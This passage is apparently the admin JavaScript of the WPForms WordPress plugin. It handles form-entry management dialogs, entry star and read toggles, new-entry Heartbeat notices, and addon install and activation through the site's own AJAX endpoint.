/* global wpforms_admin, jconfirm, wpCookies, Choices, List, wpf */

/* eslint-disable camelcase */

/**
 * @param wpforms_admin.recreating
 * @param wpforms_admin.testing
 */

/**
 * Admin script.
 *
 * @param {jQuery} $ The jQuery instance.
 */
( function( $ ) {
	// Global settings access.
	let s;

	// Admin object.
	// noinspection ES6ConvertVarToLetConst,JSUnusedGlobalSymbols
	var WPFormsAdmin = { // eslint-disable-line no-var
		// Settings.
		settings: {
			iconActivate: '<i class="fa fa-toggle-on fa-flip-horizontal" aria-hidden="true"></i>',
			iconDeactivate: '<i class="fa fa-toggle-on" aria-hidden="true"></i>',
			iconInstall: '<i class="fa fa-cloud-download" aria-hidden="true"></i>',
			iconSpinner: '<i class="fa fa-spinner fa-spin" aria-hidden="true"></i>',
			mediaFrame: false,
		},

		/**
		 * Start the engine.
		 *
		 * @since 1.3.9
		 */
		init() {
			// Settings shortcut.
			s = this.settings;

			// Document ready.
			$( WPFormsAdmin.ready );

			// Entries Single (Details).
			WPFormsAdmin.initEntriesSingle();

			// Entries List.
			WPFormsAdmin.initEntriesList();

			// Welcome activation.
			WPFormsAdmin.initWelcome();

			// Addons List.
			$( document ).on( 'wpformsReady', WPFormsAdmin.initAddons );

			// Settings.
			WPFormsAdmin.initSettings();

			// Tools.
			WPFormsAdmin.initTools();

			// Upgrades (Tools view).
			WPFormsAdmin.initUpgrades();

			// Tab menu.
			WPFormsAdmin.initScrollableMenu();
		},

		/**
		 * Document ready.
		 *
		 * @since 1.3.9
		 */
		ready() { // eslint-disable-line max-lines-per-function
			// Add `_wp_http_referer` to the data of every AJAX request.
			$.ajaxSetup( {
				data: {
					// eslint-disable-next-line camelcase
					_wp_http_referer: wpf.updateQueryString( '_wp_http_referer', null ),
				},
			} );

			// Scroll to integration.
			WPFormsAdmin.scrollToIntegration();

			// To prevent jumping (since WP core moves the notices with js),
			// they are hidden initially with CSS, then revealed below with JS,
			// which runs after they have been moved.
			$( '.notice' ).show();

			// If there are screen options, we have to move them.
			$( '#screen-meta-links, #screen-meta' ).prependTo( '#wpforms-header-temp' ).show();

			// Init fancy selects via choices.js.
			WPFormsAdmin.initChoicesJS();

			// Reinit ChoicesJS after htmx swap.
			$( document ).on( 'htmx:afterSwap', WPFormsAdmin.initChoicesJS );

			// Init checkbox multi selects columns.
			WPFormsAdmin.initCheckboxMultiselectColumns();

			// Init color pickers via minicolors.js.
			$( '.wpforms-color-picker' ).each( function() {
				const $this = $( this );

				$this.minicolors( {
					defaultValue: $this.data( 'fallback-color' ) || '',
				} );
			} );

			// Init fancy File Uploads.
			$( '.wpforms-file-upload' ).each( function() {
				const $input	 = $( this ).find( 'input[type=file]' ),
					$label	 = $( this ).find( 'label' ),
					labelVal = $label.html();
				$input.on( 'change', function( event ) {
					let fileName = '';
					if ( this.files && this.files.length > 1 ) {
						fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
					} else if ( event.target.value ) {
						fileName = event.target.value.split( '\\' ).pop();
					}
					if ( fileName ) {
						$label.find( '.fld' ).html( fileName );
					} else {
						$label.html( labelVal );
					}
				} );

				// Firefox bug fix.
				$input.on( 'focus', function() {
					$input.addClass( 'has-focus' );
				} ).on( 'blur', function() {
					$input.removeClass( 'has-focus' );
				} );
			} );

			// jquery-confirm defaults.
			jconfirm.defaults = {
				closeIcon: false,
				backgroundDismiss: false,
				escapeKey: true,
				animationBounce: 1,
				useBootstrap: false,
				theme: 'modern',
				boxWidth: '400px',
				animateFromElement: false,
				content: wpforms_admin.something_went_wrong,
			};

			// Upgrade information modal for upgrade links.
			$( document ).on( 'click', '.wpforms-upgrade-modal', function() {
				$.alert( {
					title: wpforms_admin.thanks_for_interest,
					content: wpforms_admin.upgrade_modal,
					icon: 'fa fa-info-circle',
					type: 'blue',
					boxWidth: '550px',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
						},
					},
				} );
			} );

			// Lity lightbox.
			WPFormsAdmin.initLity();

			// Flyout Menu.
			WPFormsAdmin.initFlyoutMenu();

			// Action available for each binding.
			$( document ).trigger( 'wpformsReady' );

			// Start listening for screen options changes.
			$( '#screen-options-wrap .hide-column-tog' ).on( 'change', WPFormsAdmin.handleOnChangeScreenOptions );
		},

		/**
		 * For styling purposes, we will add a dedicated class name for determining the number of visible columns.
		 *
		 * @since 1.8.3
		 */
		handleOnChangeScreenOptions() {
			const $table = $( '.wpforms-table-list' );
			const $columns = $table.find( 'thead .manage-column' );
			const $hidden = $columns.filter( '.hidden' );
			const hasManyColumns = Boolean( ( $columns.length - $hidden.length ) > 5 );

			// This is used to adjust the table layout.
			// Add a class to the table to indicate the number of columns.
			$table.toggleClass( 'has-many-columns', hasManyColumns );
			$table.toggleClass( 'has-few-columns', ! hasManyColumns );
		},

		/**
		 * Initialize Choices JS elements.
		 *
		 * @since 1.4.2
		 */
		initChoicesJS() {
			$( '.choicesjs-select' ).each( function() {
				const $this = $( this ),
					args = window.wpforms_admin_choicesjs_config ? { ...window.wpforms_admin_choicesjs_config } : {};

				if ( $this.attr( 'multiple' ) ) {
					args.removeItemButton = typeof args.removeItemButton !== 'undefined' ? args.removeItemButton : true;
				}

				if ( $this.data( 'sorting' ) === 'off' ) {
					args.shouldSort = false;
				}

				if ( $this.data( 'search' ) ) {
					args.searchEnabled = true;
				}

				if ( $this.data( 'choices-position' ) ) {
					args.position = $this.data( 'choices-position' );
				}

				// Render HTML in Choices.js.
				args.allowHTML = true;

				// Function to run once Choices initializes.
				// We need to reproduce a behavior like on the public-facing area for "Edit Entry" page.
				args.callbackOnInit = function() {
					const self = this;
					const $element = $( self.passedElement.element );
					const sizeClass = $element.data( 'size-class' );

					// Add a CSS class for size.
					if ( sizeClass ) {
						$( self.containerOuter.element ).addClass( sizeClass );
					}

					wpf.initMultipleSelectWithSearch( this );
					wpf.showMoreButtonForChoices( self.containerOuter.element );
				};

				$this.data( 'choicesjs', new Choices( $this[ 0 ], args ) );
			} );

			// Add the ability to close the drop-down menu.
			$( document ).on( 'click', '.choices', function( e ) {
				const $choices = $( this ),
					choicesObj = $choices.find( 'select' ).data( 'choicesjs' );

				if (
					choicesObj &&
					$choices.hasClass( 'is-open' ) &&
					(
						e.target.classList.contains( 'choices__inner' ) ||
						e.target.classList.contains( 'choices__arrow' )
					)
				) {
					choicesObj.hideDropdown();
				}
			} );

			wpf.initializeChoicesEventHandlers();
		},

		/**
		 * Initialize checkbox multi-select columns.
		 *
		 * @since 1.4.2
		 */
		initCheckboxMultiselectColumns() {
			$( document ).on( 'change', '.checkbox-multiselect-columns input', function() {
				const $this = $( this ),
					$parent = $this.parent(),
					$container = $this.closest( '.checkbox-multiselect-columns' ),
					label = $parent.text(),
					itemID = 'check-item-' + $this.val(),
					$item = $container.find( '#' + itemID );

				if ( $this.prop( 'checked' ) ) {
					$this.parent().addClass( 'checked' );
					if ( ! $item.length ) {
						$container.find( '.second-column ul' ).append( '<li id="' + itemID + '">' + label + '</li>' );
					}
				} else {
					$this.parent().removeClass( 'checked' );
					$container.find( '#' + itemID ).remove();
				}
			} );

			$( document ).on( 'click', '.checkbox-multiselect-columns .all', function( event ) {
				event.preventDefault();

				$( this ).closest( '.checkbox-multiselect-columns' ).find( 'input[type=checkbox]' ).prop( 'checked', true ).trigger( 'change' );
				$( this ).remove();
			} );
		},

		//--------------------------------------------------------------------//
		// Forms Overview
		//--------------------------------------------------------------------//

		/**
		 * Element bindings for the Form Overview page.
		 *
		 * @since 1.3.9
		 * @since 1.7.3 Deprecated.
		 *
		 * @deprecated Use `WPFormsForms.Overview.init()` instead.
		 */
		initFormOverview() {
			// eslint-disable-next-line no-console
			console.warn( 'WARNING! Function "WPFormsAdmin.initFormOverview()" has been deprecated, please use the new "WPFormsForms.Overview.init()" function instead!' );

			window.WPFormsForms.Overview.init();
		},

		//--------------------------------------------------------------------//
		// Entry Single (Details)
		//--------------------------------------------------------------------//

		/**
		 * Element bindings for the Entries List table page.
		 *
		 * @since 1.3.9
		 */
		initEntriesList() { // eslint-disable-line max-lines-per-function
			// Toggle form selector dropdown.
			$( document ).on( 'click', '#wpforms-entries-list .form-selector .toggle', function( event ) {
				event.preventDefault();

				$( this ).toggleClass( 'active' ).next( '.form-list' ).toggle();
			} );

			// Confirm bulk entry deletion.
			$( document ).on( 'click', '#wpforms-entries-table #doaction', function( event ) {
				const $btn = $( this ),
					$form = $btn.closest( 'form' ),
					$table = $form.find( 'table' ),
					$action = $form.find( 'select[name=action]' ),
					$checked = $table.find( 'input[name^=entry_id]:checked' );

				if ( ( 'delete' !== $action.val() && 'trash' !== $action.val() ) || ! $checked.length ) {
					return;
				}

				const $content = 'delete' === $action.val() ? wpforms_admin.entry_delete_n_confirm : wpforms_admin.entry_trash_n_confirm;

				event.preventDefault();

				// Trigger alert modal to confirm.
				$.confirm( {
					title: wpforms_admin.heads_up,
					content: $content.replace( '{entry_count}', $checked.length ),
					icon: 'fa fa-exclamation-circle',
					type: 'orange',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
							action() {
								$form.trigger( 'submit' );
							},
						},
						cancel: {
							text: wpforms_admin.cancel,
							keys: [ 'esc' ],
						},
					},
				} );
			} );

			// Confirm entry deletion.
			$( document ).on( 'click', '#wpforms-entries-list .wp-list-table .delete', function( event ) {
				event.preventDefault();

				const url = $( this ).attr( 'href' );

				// Trigger alert modal to confirm.
				$.confirm( {
					title: wpforms_admin.heads_up,
					content: wpforms_admin.entry_delete_confirm,
					icon: 'fa fa-exclamation-circle',
					type: 'orange',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
							action() {
								window.location = url;
							},
						},
						cancel: {
							text: wpforms_admin.cancel,
							keys: [ 'esc' ],
						},
					},
				} );
			} );

			// Confirm entry trash.
			$( document ).on( 'click', '#wpforms-entries-list .wp-list-table .trash', function( event ) {
				event.preventDefault();

				const url = $( this ).attr( 'href' );

				// Trigger alert modal to confirm.
				$.confirm( {
					title: wpforms_admin.heads_up,
					content: wpforms_admin.entry_trash_confirm,
					icon: 'fa fa-exclamation-circle',
					type: 'orange',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
							action: () => {
								window.location = url;
							},
						},
						cancel: {
							text: wpforms_admin.cancel,
							keys: [ 'esc' ],
						},
					},
				} );
			} );

			// Toggle entry stars.
			$( document ).on( 'click', '#wpforms-entries-list .wp-list-table .indicator-star', function( event ) {
				event.preventDefault();

				const $this = $( this );
				const $counter = $( '#wpforms-entries-list .starred-num' );
				const $table = $this.parents( 'table' );

				let task;
				let total = Number( $counter.text() );

				if ( $this.hasClass( 'star' ) ) {
					task = 'star';
					total++;
					$this.attr( 'title', wpforms_admin.entry_unstar );
				} else {
					task = 'unstar';
					total--;
					$this.attr( 'title', wpforms_admin.entry_star );
				}

				$this.toggleClass( 'star unstar' );

				if ( ! $table.hasClass( 'wpforms-entries-table-spam' ) && ! $table.hasClass( 'wpforms-entries-table-trash' ) ) {
					$counter.text( total );
				}

				const data = {
					task,
					action  : 'wpforms_entry_list_star',
					nonce   : wpforms_admin.nonce,
					entryId : $this.data( 'id' ),
					formId  : $this.data( 'form-id' ),
				};

				$.post( wpforms_admin.ajax_url, data );
			} );

			// Toggle entry read state.
			$( document ).on( 'click', '#wpforms-entries-list .wp-list-table .indicator-read', function( event ) {
				event.preventDefault();

				const $this = $( this );
				const $counter = $( '#wpforms-entries-list .unread-num' );
				const $table = $this.parents( 'table' );

				let task;
				let total = Number( $counter.text() );

				if ( $this.hasClass( 'read' ) ) {
					task = 'read';
					total--;
					$this.attr( 'title', wpforms_admin.entry_unread );
				} else {
					task = 'unread';
					total++;
					$this.attr( 'title', wpforms_admin.entry_read );
				}

				$this.toggleClass( 'read unread' );

				if ( ! $table.hasClass( 'wpforms-entries-table-spam' ) && ! $table.hasClass( 'wpforms-entries-table-trash' ) ) {
					$counter.text( total );
				}

				const data = {
					task,
					action  : 'wpforms_entry_list_read',
					nonce   : wpforms_admin.nonce,
					entryId : $this.data( 'id' ),
					formId  : $this.data( 'form-id' ),
				};

				$.post( wpforms_admin.ajax_url, data );
			} );

			// Confirm mass entry deletion/trash - this deletes/trashes ALL entries.
			$( document ).on( 'click', '#wpforms-entries-list .form-details-actions-removeall', function( event ) {
				event.preventDefault();

				const $page = $( this ).data( 'page' ),
					$noticeData = WPFormsAdmin.getDeleteAllNoticeData( $page ),
					$url = $( this ).attr( 'href' ),
					$table = $( '#wpforms-entries-table' ),
					filteredCount = $table.data( 'filtered-count-trash' ) && $noticeData.action === 'trash' ? parseInt( $table.data( 'filtered-count-trash' ), 10 ) : 0,
					data = {
						action: 'wpforms_entry_list_process_' + $noticeData.action + '_all',
						form_id: $table.find( 'input[name="form_id"]' ).val(), // eslint-disable-line camelcase
						date: $table.find( 'input[name="date"]' ).val(),
						page: $page,
						search: {
							field: $table.find( 'select[name="search[field]"]' ).val(),
							comparison: $table.find( 'select[name="search[comparison]"]' ).val(),
							term: $table.find( 'input[name="search[term]"]' ).val(),
						},
						nonce: wpforms_admin.nonce,
						url: $url,
					};

				// Trigger alert modal to confirm.
				$.confirm( {
					title: wpforms_admin.heads_up,
					content: filteredCount && $( '#wpforms-reset-filter' ).length ? $noticeData.content.replace( '{entry_count}', filteredCount ) : $noticeData.contentAll,
					icon: 'fa fa-exclamation-circle',
					type: 'orange',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
							action: () => {
								$.get( wpforms_admin.ajax_url, data )
									.done( function( response ) {
										if ( response.success ) {
											window.location = ! _.isEmpty( response.data ) ? response.data : $url;
										}
									} );
							},
						},
						cancel: {
							text: wpforms_admin.cancel,
							keys: [ 'esc' ],
						},
					},
				} );
			} );

			// Check for new form entries using Heartbeat API.
			$( document ).on( 'heartbeat-send', function( event, data ) {
				const $entriesList = $( '#wpforms-entries-list' );

				// Works on the entry list page only.
				if ( ! $entriesList.length || $entriesList.find( '.wpforms-dash-widget' ).length ) {
					return;
				}

				const last_entry_id = $entriesList.find( '#wpforms-entries-table' ).data( 'last-entry-id' );

				// When entry list is filtered, there is no data param at all.
				if ( typeof last_entry_id === 'undefined' ) {
					return;
				}

				data.wpforms_new_entries_entry_id = last_entry_id;
				data.wpforms_new_entries_form_id = $entriesList.find( 'input[name=form_id]' ).val();
			} );

			// Display entries list notification if Heartbeat API new form entries check is successful.
			$( document ).on( 'heartbeat-tick', function( event, data ) {
				const $entriesList = $( '#wpforms-entries-list' );

				// Works on the entry list page only.
				if ( ! $entriesList.length ) {
					return;
				}

				if ( ! data.wpforms_new_entries_notification ) {
					return;
				}

				const columnCount = $entriesList.find( '.wp-list-table thead tr' ).first().children().length;

				if ( ! $entriesList.find( '.new-entries-notification' ).length ) {
					$entriesList.find( '.wp-list-table thead' )
						.append( '<tr class="new-entries-notification"><td colspan="' + columnCount + '"><a href=""></a></td></tr>' );
				}

				const $link = $entriesList.find( '.new-entries-notification a' );

				$link
					.text( data.wpforms_new_entries_notification )
					.slideDown( {
						start() {
							$link.css( 'display', 'block' );
						},
						always() {
							$link.css( 'display', 'block' );
						},
					} );
			} );
		},

		/**
		 * Element bindings for the Entries Single (Details) page.
		 *
		 * @since 1.3.9
		 */
		initEntriesSingle() { // eslint-disable-line max-lines-per-function
			// Entry navigation hotkeys.
			// We only want to listen on the applicable admin page.
			if ( 'wpforms-entries' === WPFormsAdmin.getQueryString( 'page' ) && 'details' === WPFormsAdmin.getQueryString( 'view' ) ) {
				WPFormsAdmin.entryHotkeys();
			}

			// Confirm entry deletion.
			$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-delete a', function( event ) {
				event.preventDefault();

				const url = $( this ).attr( 'href' );

				// Trigger alert modal to confirm.
				$.confirm( {
					title: wpforms_admin.heads_up,
					content: wpforms_admin.entry_delete_confirm,
					icon: 'fa fa-exclamation-circle',
					type: 'orange',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
							action() {
								window.location = url;
							},
						},
						cancel: {
							text: wpforms_admin.cancel,
							keys: [ 'esc' ],
						},
					},
				} );
			} );

			// Confirm entry trash.
			$( document ).on( 'click', '#wpforms-entries-single .trash', function( event ) {
				event.preventDefault();

				const url = $( this ).attr( 'href' );

				// Trigger alert modal to confirm.
				$.confirm( {
					title: wpforms_admin.heads_up,
					content: wpforms_admin.entry_trash_confirm,
					icon: 'fa fa-exclamation-circle',
					type: 'orange',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
							action: () => {
								window.location = url;
							},
						},
						cancel: {
							text: wpforms_admin.cancel,
							keys: [ 'esc' ],
						},
					},
				} );
			} );

			// Open Print preview in a new window.
			$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-print a', function( event ) {
				event.preventDefault();

				window.open( $( this ).attr( 'href' ) );
			} );

			// Toggle displaying empty fields.
			$( document ).on( 'click', '#wpforms-entries-single .wpforms-empty-field-toggle', function( event ) {
				event.preventDefault();

				// Handle cookie.
				if ( wpCookies.get( 'wpforms_entry_hide_empty' ) === 'true' ) {
					// User was hiding empty fields, so now display them.
					wpCookies.remove( 'wpforms_entry_hide_empty' );
					$( this ).text( wpforms_admin.entry_empty_fields_hide );
				} else {
					// User was seeing empty fields, so now hide them.
					wpCookies.set( 'wpforms_entry_hide_empty', 'true', 2592000 ); // 1month.
					$( this ).text( wpforms_admin.entry_empty_fields_show );
				}

				$( '.wpforms-entry-field.empty, .wpforms-edit-entry-field.empty' ).toggle();
			} );

			// Display notes editor.
			$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-notes-new .add', function( event ) {
				event.preventDefault();

				$( this ).hide().next( 'form' ).stop().slideToggle();
			} );

			// Cancel note.
			$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-notes-new .cancel', function( event ) {
				event.preventDefault();

				$( this ).closest( 'form' ).stop().slideToggle();
				$( '.wpforms-entry-notes-new .add' ).show();
			} );

			// Delete note.
			$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-notes-byline .note-delete', function( event ) {
				event.preventDefault();

				const url = $( this ).attr( 'href' );

				// Trigger alert modal to confirm.
				$.confirm( {
					title: wpforms_admin.heads_up,
					content: wpforms_admin.entry_note_delete_confirm,
					icon: 'fa fa-exclamation-circle',
					type: 'orange',
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
							action() {
								window.location = url;
							},
						},
						cancel: {
							text: wpforms_admin.cancel,
							keys: [ 'esc' ],
						},
					},
				} );
			} );
		},

		//--------------------------------------------------------------------//
		// Entry List
		//--------------------------------------------------------------------//

		/**
		 * Hotkeys for Entries Single (Details) page.
		 *
		 * j triggers previous entry, k triggers next entry.
		 *
		 * @since 1.4.0
		 */
		entryHotkeys() {
			$( document ).on( 'keydown', function( event ) {
				if ( 74 === event.keyCode && ! event.metaKey && ! WPFormsAdmin.isFormTypeNode( event.target.nodeName ) ) {
					// j key has been pressed outside a form element, go to the previous entry.
					const prevEntry = $( '#wpforms-admin-single-navigation-prev-link' ).attr( 'href' );
					if ( '#' !== prevEntry ) {
						window.location.href = prevEntry;
					}
				} else if ( 75 === event.keyCode && ! event.metaKey && ! WPFormsAdmin.isFormTypeNode( event.target.nodeName ) ) {
					// k key has been pressed outside a form element, go to the previous entry.
					const nextEntry = $( '#wpforms-admin-single-navigation-next-link' ).attr( 'href' );
					if ( '#' !== nextEntry ) {
						window.location.href = nextEntry;
					}
				}
			} );
		},

		//--------------------------------------------------------------------//
		// Welcome Activation.
		//--------------------------------------------------------------------//

		/**
		 * Welcome activation page.
		 *
		 * @since 1.3.9
		 */
		initWelcome() {
			// Open modal and play How-To video.
			$( document ).on( 'click', '#wpforms-welcome .play-video', function( event ) {
				event.preventDefault();

				const video = '<div class="video-container"><iframe width="1280" height="720" src="https://www.youtube-nocookie.com/embed/SQ9kV9SKz5k?rel=0&amp;showinfo=0&amp;autoplay=1" frameborder="0" allowfullscreen></iframe></div>';

				$.dialog( {
					title: false,
					content: video,
					closeIcon: true,
					boxWidth: '70%',
				} );
			} );
		},

		//--------------------------------------------------------------------//
		// Addons List.
		//--------------------------------------------------------------------//

		/**
		 * Element bindings for the Addons List page.
		 *
		 * @since 1.3.9
		 */
		initAddons() { // eslint-disable-line max-lines-per-function
			// Only run on the addons page.
			if ( ! $( '#wpforms-admin-addons' ).length ) {
				return;
			}

			// Addons searching.
			const $sectionAll = $( '#wpforms-addons-list-section-all' );
			const $sectionInstalled = $( '#wpforms-addons-list-section-installed' );

			if ( $sectionAll.length || $sectionInstalled.length ) {
				let addonSearchInstalled;
				let addonSearchAll;

				if ( $sectionInstalled.length ) {
					addonSearchInstalled = new List(
						'wpforms-addons-list-section-installed',
						{
							valueNames: [ 'addon-link' ],
						}
					);
				}

				if ( $sectionAll.length ) {
					addonSearchAll = new List(
						'wpforms-addons-list-section-all',
						{
							valueNames: [ 'addon-link' ],
						}
					);
				}

				$( '#wpforms-addons-search' ).on(
					'keyup search',
					function() {
						WPFormsAdmin.updateAddonSearchResult( this, addonSearchAll, addonSearchInstalled );
					}
				);
			}

			// Toggle an addon state.
			$( document ).on( 'change', '.wpforms-addons-list-item .wpforms-toggle-control input', function( event ) {
				event.preventDefault();

				if ( $( this ).hasClass( 'disabled' ) ) {
					return false;
				}

				WPFormsAdmin.addonToggleNew( $( this ) );
			} );

			$( document ).on( 'click', '.wpforms-addons-list-item button', function( event ) {
				event.preventDefault();

				if ( $( this ).hasClass( 'disabled' ) ) {
					return false;
				}

				WPFormsAdmin.addonToggleNew( $( this ) );
			} );

			$( document ).on( 'click', '#wpforms-admin-addons .addon-item button', function( event ) {
				event.preventDefault();

				if ( $( this ).hasClass( 'disabled' ) ) {
					return false;
				}

				WPFormsAdmin.addonToggle( $( this ) );
			} );
		},

		/**
		 * Handle addons search field operations.
		 *
		 * @since 1.7.4
		 *
		 * @param {Object} searchField          The search field HTML element.
		 * @param {Object} addonSearchAll       Addons all list (uses List.js).
		 * @param {Object} addonSearchInstalled Addons installed list (uses List.js).
		 */
		updateAddonSearchResult( searchField, addonSearchAll, addonSearchInstalled ) {
			let searchTerm = $( searchField ).val();

			/*
			 * Replace dot and comma with space
			 * it is a workaround for a bug in the list.js library.
			 *
			 * Note: remove when the issue below is fixed:
			 * @see https://github.com/javve/list.js/issues/699
			 */
			searchTerm = searchTerm.replace( /[.,]/g, ' ' );

			const $noResultsMessage = $( '#wpforms-addons-no-results' );
			const $sectionAll = $( '#wpforms-addons-list-section-all' );
			const $sectionInstalled = $( '#wpforms-addons-list-section-installed' );
			const searchResultsAll = addonSearchAll ? addonSearchAll.search( searchTerm ) : [];
			const searchResultsInstalled = addonSearchInstalled ? addonSearchInstalled.search( searchTerm ) : [];

			$noResultsMessage.toggle( searchResultsAll.length === 0 && searchResultsInstalled.length === 0 );
			$sectionAll.toggle( searchResultsAll.length > 0 );
			$sectionInstalled.toggle( searchResultsInstalled.length > 0 );
		},

		/**
		 * Change plugin/addon state.
		 *
		 * @since 1.6.3
		 *
		 * @param {string}   plugin        Plugin slug or URL for download.
		 * @param {string}   state         State status activate|deactivate|install.
		 * @param {string}   pluginType    Plugin type addon or plugin.
		 * @param {Function} callback      Callback for get a result from AJAX.
		 * @param {Function} errorCallback Callback for get error from AJAX.
		 */
		setAddonState( plugin, state, pluginType, callback, errorCallback ) {
			const actions = {
				activate: 'wpforms_activate_addon',
				install: 'wpforms_install_addon',
				deactivate: 'wpforms_deactivate_addon',
				incompatible: 'wpforms_activate_addon',
			};
			const action = actions[ state ];

			if ( ! action ) {
				return;
			}

			const data = {
				action,
				nonce: wpforms_admin.nonce,
				plugin,
				type: pluginType,
			};

			$.post( wpforms_admin.ajax_url, data, function( res ) {
				callback( res );
			} ).fail( function( xhr ) {
				errorCallback( xhr );
			} );
		},

		/**
		 * Toggle addon state.
		 *
		 * @since 1.8.6
		 *
		 * @param {Object} $btn Button element.
		 */
		// eslint-disable-next-line max-lines-per-function
		addonToggleNew( $btn ) {
			const $footer = $btn.parents( '.wpforms-addons-list-item-footer' );
			const classes = {
				active: 'wpforms-addons-list-item-footer-active',
				activating: 'wpforms-addons-list-item-footer-activating',
				incompatible: 'wpforms-addons-list-item-footer-incompatible',
				installed: 'wpforms-addons-list-item-footer-installed',
				missing: 'wpforms-addons-list-item-footer-missing',
				goToUrl: 'wpforms-addons-list-item-footer-go-to-url',
				withError: 'wpforms-addons-list-item-footer-with-error',
			};

			// Open url in new tab.
			if ( $footer.hasClass( classes.goToUrl ) ) {
				window.open( $btn.attr( 'data-plugin' ), '_blank' );
				return;
			}

			$btn.prop( 'disabled', true );

			let checked = $btn.is( ':checked' );
			let cssClass;
			const plugin = $footer.attr( 'data-plugin' );
			const pluginType = $footer.attr( 'data-type' );
			const $addon = $btn.parents( '.wpforms-addons-list-item' );
			const state = WPFormsAdmin.getAddonState( $footer, classes, $btn );

			/**
			 * Handle error.
			 *
			 * @param {Object} res Response object.
			 */
			function handleError( res ) {
				$footer.addClass( classes.withError );

				if ( typeof res.data === 'object' ) {
					$footer.append( `<div class="wpforms-addons-list-item-footer-error"><p>${ pluginType === 'addon' ? wpforms_admin.addon_error : wpforms_admin.plugin_error }</p></div>` );
				} else {
					$footer.append( `<div class="wpforms-addons-list-item-footer-error"><p>${ res.data }</p></div>` );
				}

				if ( state === 'install' ) {
					checked = false;
					WPFormsAdmin.removeSpinnerFromButton( $btn );
				} else if ( state === 'deactivate' ) {
					checked = true;
				} else if ( state === 'activate' ) {
					checked = false;
				}
			}

			/**
			 * Handle success.
			 *
			 * @param {Object} res Response object.
			 */
			function handleSuccess( res ) {
				if ( state === 'install' ) {
					cssClass = classes.active;
					checked = true;

					$footer.attr( 'data-plugin', res.data.basename );

					if ( ! res.data.is_activated ) {
						cssClass = classes.installed;
						checked = false;
					}

					$btn.hide();
					$btn = $btn.closest( '.wpforms-addons-list-item' ).find( '.wpforms-toggle-control input' );
				} else if ( state === 'activate' ) {
					$footer.find( '.wpforms-addons-list-item-footer-settings-link' ).fadeIn( 150 );
					cssClass = classes.active;
					checked = true;
				} else if ( state === 'deactivate' ) {
					$footer.find( '.wpforms-addons-list-item-footer-settings-link' ).fadeOut( 150 );
					cssClass = classes.installed;
					checked = false;
				}

				$footer.removeClass( classes.active + ' ' + classes.incompatible + ' ' + classes.installed + ' ' + classes.missing ).addClass( cssClass );
			}

			WPFormsAdmin.setAddonState( plugin, state, pluginType, function( res ) {
				if ( res.success ) {
					handleSuccess( res );
				} else {
					handleError( res );
				}

				WPFormsAdmin.updateAddonButtonPropertiesAndUI( $btn, $addon, $footer, classes, checked );
			}, function() {
				handleError( {
					data: wpforms_admin.server_error,
				} );

				WPFormsAdmin.updateAddonButtonPropertiesAndUI( $btn, $addon, $footer, classes, checked );
			} );
		},

		/**
		 * Add spinner to button.
		 *
		 * @since 1.8.6
		 *
		 * @param {Object} $button Button element.
		 */
		addSpinnerToButton( $button ) {
			const spinnerBlue = '<i class="wpforms-loading-spinner wpforms-loading-blue wpforms-loading-inline"></i>';
			const originalWidth = $button.width();

			$button.data( 'original-text', $button.html() );
			$button.width( originalWidth ).html( spinnerBlue );
		},

		/**
		 * Remove spinner from button.
		 *
		 * @since 1.8.6
		 *
		 * @param {Object} $button Button element.
		 */
		removeSpinnerFromButton( $button ) {
			$button.html( $button.data( 'original-text' ) );
		},

		/**
		 * Get addon state.
		 *
		 * @since 1.8.6
		 *
		 * @param {Object} $footer Footer element.
		 * @param {Object} classes Classes object.
		 * @param {Object} $button Button element.
		 *
		 * @return {string} State.
		 */
		getAddonState( $footer, classes, $button ) {
			if ( $footer.hasClass( classes.active ) || $footer.hasClass( classes.incompatible ) ) {
				return 'deactivate';
			}

			if ( $footer.hasClass( classes.installed ) ) {
				return 'activate';
			}

			if ( $footer.hasClass( classes.missing ) ) {
				WPFormsAdmin.addSpinnerToButton( $button );
				return 'install';
			}

			return '';
		},

		/**
		 * Update button properties and UI.
		 *
		 * @since 1.8.6
		 *
		 * @param {Object}  $btn    Button element.
		 * @param {Object}  $addon  Addon element.
		 * @param {Object}  $footer Footer element.
		 * @param {Object}  classes Classes object.
		 * @param {boolean} checked Checked state.
		 */
		updateAddonButtonPropertiesAndUI( $btn, $addon, $footer, classes, checked ) {
			$btn.prop( 'checked', checked );
			$btn.prop( 'disabled', false );
			$btn.siblings( '.wpforms-toggle-control-status' ).html( $btn.siblings( '.wpforms-toggle-control-status' ).data( checked ? 'on' : 'off' ) );

			if ( $addon.find( '.wpforms-addons-list-item-footer-error' ).length > 0 ) {
				setTimeout( function() {
					$footer.removeClass( classes.withError );
					$addon.find( '.wpforms-addons-list-item-footer-error' ).remove();
				}, 6000 );
			}
		},

		/**
		 * Scroll to integration.
		 *
		 * @since 1.8.6
		 */
		scrollToIntegration() {
			const currentURL = window.location.href;
			// eslint-disable-next-line compat/compat
			const urlObject = new URL( currentURL );
			const searchParams = urlObject.searchParams;
			const addon = searchParams.get( 'addon' );

			if ( addon ) {
				const $elementToScrollTo = $( '.wpforms-settings-provider[id*="' + addon + '"]' );

				if ( $elementToScrollTo.length ) {
					$( window ).scrollTop( $elementToScrollTo.offset().top );
					searchParams.delete( 'addon' );

					window.history.pushState( {}, document.title, urlObject.toString() );
				}
			}
		},

		/**
		 * Toggle addon state.
		 *
		 * @since 1.3.9
		 *
		 * @param {Object} $btn Button element.
		 */
